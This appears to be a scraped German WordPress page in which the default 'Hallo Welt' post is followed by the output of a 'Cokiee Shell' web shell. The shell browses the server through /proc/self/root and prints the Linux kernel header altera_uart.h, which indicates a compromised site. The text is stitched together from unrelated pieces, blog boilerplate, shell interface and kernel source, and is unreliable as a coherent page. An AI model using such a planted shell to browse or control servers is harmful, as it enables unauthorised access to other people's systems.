Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/src/linux-headers-3.2.0-4-common/include/linux/ |
Current File : //proc/self/root/usr/src/linux-headers-3.2.0-4-common/include/linux/altera_uart.h |
/* * altera_uart.h -- Altera UART driver defines. */ #ifndef __ALTUART_H #define __ALTUART_H #include <linux/init.h> struct altera_uart_platform_uart { unsigned long mapbase; /* Physical address base */ unsigned int irq; /* Interrupt vector */ unsigned int uartclk; /* UART clock rate */ unsigned int bus_shift; /* Bus shift (address stride) */ }; int __init early_altera_uart_setup(struct altera_uart_platform_uart *platp); #endif /* __ALTUART_H */
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare